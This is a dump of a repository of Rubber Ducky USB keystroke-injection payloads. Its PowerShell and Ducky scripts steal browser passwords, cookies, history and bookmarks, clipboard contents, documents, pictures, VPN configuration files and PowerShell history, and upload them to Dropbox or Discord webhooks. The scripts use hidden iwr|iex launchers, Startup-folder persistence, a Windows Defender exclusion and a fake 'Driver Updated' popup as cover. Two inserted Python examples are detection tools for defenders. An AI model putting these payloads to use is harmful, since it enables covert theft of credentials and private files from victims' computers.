" } catch { throw $_.Exception.Message } } # Copy Chrome Bookmarks to Bash Bunny else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_bookmarks.txt" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR ACCESS TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/Bookmark-Hog/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Bookmark-Hog

A payload to exfiltrate bookmarks of the 2 most popular browsers

## Description

This payload will enumerate through the browser directories, looking for the file that stores the bookmark history.

These files will be saved to the temp directory.

Finally, Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Bookmark-Hog/payload.txt ================================================ REM Title: Bookmark-Hog REM Author: atomiczsec REM Description: This payload is meant to exfiltrate bookmarks to the rubber ducky REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Browser-Grab/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Browser-Grab

A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers

## Description

This payload will exclude the C: drive on the device so Windows Defender doesn't flag the exe.

This payload will then download an exe designed to exfiltrate bookmarks, passwords, history and cookies of most popular browsers.

Credits to the exe: https://github.com/moonD4rk/HackBrowserData

Finally, Discord will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Admin privileges on the Device you are targeting
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass iwr ?dl=1 | iex
```

## Contributing

All contributors' names will be listed here

atomiczsec

I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Author of EXE](https://github.com/moonD4rk/HackBrowserData)
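
The Defender exclusion step in the Description above leaves a record: Microsoft Defender logs configuration changes as event ID 5007 in the `Microsoft-Windows-Windows Defender/Operational` log. The following added example (not part of this repository) parses such events and ranks newly added exclusions, covering both a whole-drive exclusion and a temp-directory exclusion; the event messages are constructed, their exact layout is an assumption, and all function names are illustrative.

```python
import re
from pathlib import PureWindowsPath

NEW_VALUE = re.compile(r"New value:[ \t]*(.*)$", re.I | re.M)
EXCLUSION = re.compile(
    r"\\Windows Defender\\Exclusions\\(Paths|Extensions|Processes)\\"
    r"(.+?)\s*=\s*0x[0-9a-f]+\s*$",
    re.I)
# Directory names that unprivileged users can normally write to.
USER_WRITABLE = {"temp", "tmp", "appdata", "downloads", "public"}


def classify_path(path):
    """Rank a path exclusion: (severity, reason)."""
    p = PureWindowsPath(path)
    if p.drive and len(p.parts) == 1:
        return "high", "whole drive excluded"
    if any(part.lower() in USER_WRITABLE for part in p.parts):
        return "high", "user-writable directory excluded"
    return "low", "specific path, confirm owner"


def new_exclusions(events):
    """Return one finding per 5007 event that adds a Defender exclusion."""
    findings = []
    for event in events:
        if event.get("id") != 5007:
            continue
        new_value = NEW_VALUE.search(event.get("message", ""))
        if not new_value:
            continue
        match = EXCLUSION.search(new_value.group(1))
        if not match:
            continue  # a removal or some other setting, not a new exclusion
        kind, target = match.group(1).capitalize(), match.group(2)
        if kind == "Paths":
            severity, reason = classify_path(target)
        else:
            severity, reason = "medium", kind.lower() + " exclusion"
        findings.append({"time": event.get("time"), "kind": kind,
                         "target": target, "severity": severity,
                         "reason": reason})
    return findings


# Constructed sample events; the message layout is an assumption.
MSG = ("Microsoft Defender Antivirus Configuration has changed.\n"
       "\tOld value: {old}\n\tNew value: {new}")
KEY = r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions"
EVENTS = [
    {"id": 5007, "time": "2024-05-01T10:02:11Z", "message": MSG.format(
        old="", new=KEY + r"\Paths\C:\Users\alice\AppData\Local\Temp = 0x0")},
    {"id": 5007, "time": "2024-05-01T10:05:40Z", "message": MSG.format(
        old="", new=KEY + r"\Paths\C:\ = 0x0")},
    {"id": 5007, "time": "2024-05-02T08:00:00Z", "message": MSG.format(
        old="", new=KEY + r"\Paths\D:\BuildCache\obj = 0x0")},
    # Removal of an exclusion: old value set, new value empty.
    {"id": 5007, "time": "2024-05-02T09:00:00Z", "message": MSG.format(
        old=KEY + r"\Extensions\.log = 0x0", new="")},
    # A different event ID, ignored by the parser.
    {"id": 1116, "time": "2024-05-02T09:30:00Z", "message": "constructed"},
]

if __name__ == "__main__":
    for finding in new_exclusions(EVENTS):
        print(finding)
```

Pairing a high-severity finding with a process-creation event for an unsigned binary started from the excluded path shortly afterwards gives a stronger signal than either event alone.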

================================================ FILE: RubberDucky/payloads/Browser-Grab/b.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Add $env:tmp to exlusions so Windows Defender doesnt flag the exe we will download Add-MpPreference -ExclusionPath $env:tmp # Download the exe and save it to temp directory iwr "https://github.com/atomiczsec/My-Payloads/blob/main/Assets/browser.exe?raw=true" -outfile "$env:tmp\browser.exe" # Execute the Browser Stealer cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait # Exfiltrate the loot to discord Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip Upload-Discord -file "$env:tmp\browserdata.zip" ================================================ FILE: RubberDucky/payloads/Browser-Grab/payload.txt ================================================ REM Title: Browser-Grab REM Author: atomiczsec REM Description: A payload to exfiltrate bookmarks, passwords, history and cookies of most popular browsers REM Target: Windows 10 DELAY 2000 GUI r DELAY 1000 STRINGLN powershell saps powershell -verb runas DELAY 1000 ALT y DELAY 1000 STRINGLN irm https:// ?dl=1 | iex REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/I.bat 
================================================ @echo off powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}" pause ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Copy-And-Waste

A payload to exfiltrate clipboard contents

## Description

This payload uses iwr to download 2 files

* I.bat
* c.ps1

**I.bat** is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup

**c.ps1** will sit in the AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click

The contents will then be sent to the Discord webhook for viewing pleasure

For killing the script press both Ctrl buttons at the same time [It will resume at reboot]

## Getting Started

### Dependencies

* Pastebin or other file sharing service, Discord webhook or other webhook service
* Windows 10,11
* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks

### Executing program

* Plug in your device
* Device will download both files and place them in proper directories to then run the script

```
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec) & [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Copy-And-Waste/c.ps1 ================================================ Add-Type -AssemblyName WindowsBase Add-Type -AssemblyName PresentationCore function dischat { [CmdletBinding()] param ( [Parameter (Position=0,Mandatory = $True)] [string]$con ) $hookUrl = 'YOUR DISCORD WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $con } Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body } dischat (get-clipboard) while (1){ $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl') $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl) $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c) $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x) if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)} elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit} else {continue} } ================================================ FILE: RubberDucky/payloads/Copy-And-Waste/payload.txt ================================================ REM Title: Copy-And-Waste REM Author: atomiczsec & I am Jakoby REM Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook REM Target: Windows 10, 11 DELAY 2000 GUI DELAY STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" ENTER REM Remember to replace the link with your pastebin shared link for the intended files to download REM Also remember to put in your discord webhook in c.ps1 REM For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH ================================================ FILE: 
RubberDucky/payloads/Copy-And-Waste/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/De-Bloater/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# De-Bloater

A payload to quickly get "Windows10Debloater"

## Description

This script will download "Windows10Debloater" - Script/Utility/Application to debloat Windows 10, to remove Windows pre-installed unnecessary applications, stop some telemetry functions, stop Cortana from being used as your Search Index, disable unnecessary scheduled tasks, and more...

## Getting Started

### Dependencies

* Windows 10

### Executing program

* Plug in your device

```
iwr -useb https://git.io/debloat|iex
```

## Contributing

All contributors' names will be listed here:

[atomiczsec](https://github.com/atomiczsec)

[Sycnex](https://github.com/Sycnex/Windows10Debloater)

[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)

================================================ FILE: RubberDucky/payloads/Doc-Hog/d.ps1 ================================================ function Doc-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse $types = @{ "*.docx" = "Word"; "*.doc" = "Word"; "*.pptx" = "PowerPoint"; "*.xlsx" = "Excel"; "*.pdf" = "PDF"; "*.jpeg" = "JPEG"; "*.png" = "PNG"; "*.jpg" = "JPEG"; "*.csv" = "CSV"; "*.txt" = "Text"; } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object {$_.Name -like $type} if ($filteredFiles) { $zipFile = "$env:TEMP\$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } ================================================ FILE: RubberDucky/payloads/Doc-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook. 
DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Doc-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Doc-Hog

A payload to exfiltrate files such as PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV.

## Description

This payload enumerates the files, creates ZIP archives of them, and sends the archives to a Discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```
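For defenders, the Run-box launcher above leaves a distinctive process-creation command line. The following added example (not part of this repository) triages command lines as they appear in process-creation audit logs; the `triage` function, the sample lines and the `files.example.invalid` URL are constructed for illustration.

```python
import re

# powershell/pwsh as the host binary, bare or at the end of a (quoted) path.
PS_HOST = re.compile(r'(?i)(^|[\\/\s"])(powershell|pwsh)(\.exe)?(["\s]|$)')
DOWNLOAD = re.compile(r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b")
EXECUTE = re.compile(r"(?i)\b(iex|invoke-expression)\b")

# indicator -> (canonical parameter, shortest accepted prefix length, aliases).
# PowerShell accepts abbreviated parameter names, so "-w", "-win" and
# "-WindowStyle" must all be treated as the same switch.
LAUNCH_PARAMS = {
    "hidden_window": ("windowstyle", 1, ()),
    "bypass": ("executionpolicy", 2, ("ep",)),
    "noprofile": ("noprofile", 3, ()),
    "noninteractive": ("noninteractive", 4, ()),
}

# Constructed sample command lines (not taken from real logs).
SAMPLE_LINES = [
    "powershell -w h -NoP -NonI -ep Bypass $pl = iwr https://files.example.invalid/s.ps1?dl=1; iex $pl",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
    r"-ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    "powershell.exe -NoProfile -Command Get-Service",
    "cmd.exe /c dir",
    'pwsh -nop -c "Invoke-Expression (Invoke-WebRequest https://files.example.invalid/a.ps1).Content"',
]


def is_param(token, canonical, min_len, aliases=()):
    """True if token is -Name or /Name where Name abbreviates canonical."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    name = token[1:].lower()
    return name in aliases or (len(name) >= min_len and canonical.startswith(name))


def indicators(cmdline):
    """Return the set of launcher indicators present in one command line."""
    tokens = cmdline.split()
    found = set()
    for i, tok in enumerate(tokens):
        value = tokens[i + 1].strip("\"'").lower() if i + 1 < len(tokens) else ""
        for label, (canonical, min_len, aliases) in LAUNCH_PARAMS.items():
            if not is_param(tok, canonical, min_len, aliases):
                continue
            if label == "hidden_window":
                # "-w h" works because the value may be abbreviated too.
                hit = bool(value) and "hidden".startswith(value)
            elif label == "bypass":
                hit = value == "bypass"
            else:
                hit = True
            if hit:
                found.add(label)
    if DOWNLOAD.search(cmdline):
        found.add("download")
    if EXECUTE.search(cmdline):
        found.add("execute")
    return found


def triage(cmdline):
    """Classify a command line as 'alert', 'review' or 'ignore'."""
    if not PS_HOST.search(cmdline):
        return ("ignore", [])
    found = indicators(cmdline)
    launch_flags = found & set(LAUNCH_PARAMS)
    if {"download", "execute"} <= found:
        verdict = "alert"      # fetch-and-run in a single command line
    elif len(launch_flags) >= 2:
        verdict = "review"     # stealthy launch flags, but a local script
    else:
        verdict = "ignore"
    return (verdict, sorted(found))


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        verdict, found = triage(line)
        print(f"{verdict:7} {','.join(found) or '-':60} {line[:60]}")
```

Matching on parameter prefixes rather than literal strings matters here: a rule that only looks for `-ep Bypass` misses the spelled-out `-ExecutionPolicy Bypass` form of the same launcher.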

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/History-Pig/HP.ps1 ================================================ #History-Pig # See if file is a thing Test-Path -Path "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Chrome History file has not been found. " } catch { throw $_.Exception.Message } } # Copy Chrome History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history" Copy-Item "$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History" -Destination "$env:tmp/$F1" } # See if file is a thing Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -PathType Leaf)) { try { Write-Host "The Edge History file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Edge History to Temp Directory to get sent to Dropbox else { $F2 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history" Copy-Item "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History" -Destination "$env:tmp/$F2" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "ADD-YOUR-DROPBOX-TOKEN-HERE" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" DropBox-Upload -f "$env:tmp/$F2" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/History-Pig/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# History-Pig

A payload to exfiltrate the history of the 2 most popular browsers.

## Description

This payload will enumerate through the browser directories, looking for the file that stores the history.
These files will be saved to the temp directory.
Finally, Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/History-Pig/payload.txt ================================================ REM Title: History-Pig REM Author: atomiczsec REM Description: This payload is meant to exfiltrate browsers history to a dropbox REM Target: Windows 10, 11 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/OVPN-Hog/o.ps1 ================================================ function OVPN-Hog { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))) { Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json) } if (-not ([string]::IsNullOrEmpty($file))) { curl.exe -F "file1=@$file" $hookurl } } $Drive = "C:" $Files = Get-ChildItem -Path $Drive -Filter "*.ovpn" -File -Recurse if ($Files) { $types = @{ "*.ovpn" = "OpenVPN" } foreach ($type in $types.Keys) { $filteredFiles = $Files | Where-Object { $_.Name -like $type } if ($filteredFiles) { $zipFile = Join-Path -Path $env:TEMP -ChildPath "$($types[$type]).zip" $filteredFiles | Compress-Archive -DestinationPath $zipFile OVPN-Hog -file $zipFile -text "Uploading $($types[$type]) files" } } } ================================================ FILE: RubberDucky/payloads/OVPN-Hog/payload.txt ================================================ REM Title: Doc-Hog REM Author: atomiczsec REM Description: This payload will enumerate through the files 
looking for ".ovpn" files. Then create ZIPs with them, then send to a discord webhook. DEFINE URL http://new-url.com/powershell.ps1 REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/OVPN-Hog/readme.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# OVPN-Hog

A PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).

## Description

This script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Picture-Hog/p.ps1 ================================================ function Upload-Discord { [CmdletBinding()] param ( [parameter(Position=0,Mandatory=$False)] [string]$file, [parameter(Position=1,Mandatory=$False)] [string]$text ) $hookurl = 'YOUR-DISCORD-WEBHOOK' $Body = @{ 'username' = $env:username 'content' = $text } if (-not ([string]::IsNullOrEmpty($text))){ Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} } # Enumerate all .png and .jpg files in the current user's home directory and all subdirectories $Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.png","*.jpg" -Recurse # Iterate through each file foreach ($File in $Files) { # Get the file name and file path $FileName = $File.Name $FilePath = $File.FullName # Call the Upload-Discord function, passing the file path and file name as arguments Upload-Discord -file $FilePath } ================================================ FILE: RubberDucky/payloads/Picture-Hog/placeholder ================================================ ================================================ FILE: RubberDucky/payloads/Powershell-History/PH.ps1 ================================================ #Powershell-History # See if file is a thing Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf #If the file does not exist, write to host. if (-not(Test-Path -Path "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -PathType Leaf)) { try { Write-Host "The Powershell History file has not been found. 
" } catch { throw $_.Exception.Message } } # Copy Powershell History to Temp Directory to get sent to Dropbox else { $F1 = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt" Copy-Item "$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" -Destination "$env:tmp/$F1" } function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' $authorization = "Bearer " + $DropBoxAccessToken $headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" $headers.Add("Authorization", $authorization) $headers.Add("Dropbox-API-Arg", $arg) $headers.Add("Content-Type", 'application/octet-stream') Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers } DropBox-Upload -f "$env:tmp/$F1" $done = New-Object -ComObject Wscript.Shell;$done.Popup("Driver Updated",1) ================================================ FILE: RubberDucky/payloads/Powershell-History/README.md ================================================

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments
# Powershell-History

A payload to exfiltrate the history of the PowerShell console.

## Description

This payload will enumerate through the PowerShell directories, looking for the file that stores the history of the PowerShell console.
These files will be saved to the temp directory.
Finally, Dropbox will be used to exfiltrate the files to cloud storage.

## Getting Started

### Dependencies

* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10

### Executing program

* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory

```
powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
```

## Contributing

All contributors' names will be listed here:

* atomiczsec
* I am Jakoby

## Version History

* 0.1
    * Initial Release

## Contact

📱 My Socials 📱

* YouTube
* Twitter
* I-Am-Jakoby's Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)

================================================ FILE: RubberDucky/payloads/Powershell-History/payload.txt ================================================ REM Title: Powershell-History REM Author: atomiczsec REM Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation REM Target: Windows 10 DELAY 2000 GUI r DELAY 500 STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl ENTER REM Remember to replace the link with your DropBox shared link for the intended file to download REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1 ================================================ FILE: RubberDucky/payloads/Printer-Recon/PR.ps1 ================================================ function DropBox-Upload { [CmdletBinding()] param ( [Parameter (Mandatory = $True, ValueFromPipeline = $True)] [Alias("f")] [string]$SourceFilePath ) $DropBoxAccessToken = "YOUR-DROPBOX-TOKEN" # Replace with your DropBox Access Token $outputFile = Split-Path $SourceFilePath -leaf $TargetFilePath="/$outputFile" $arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", 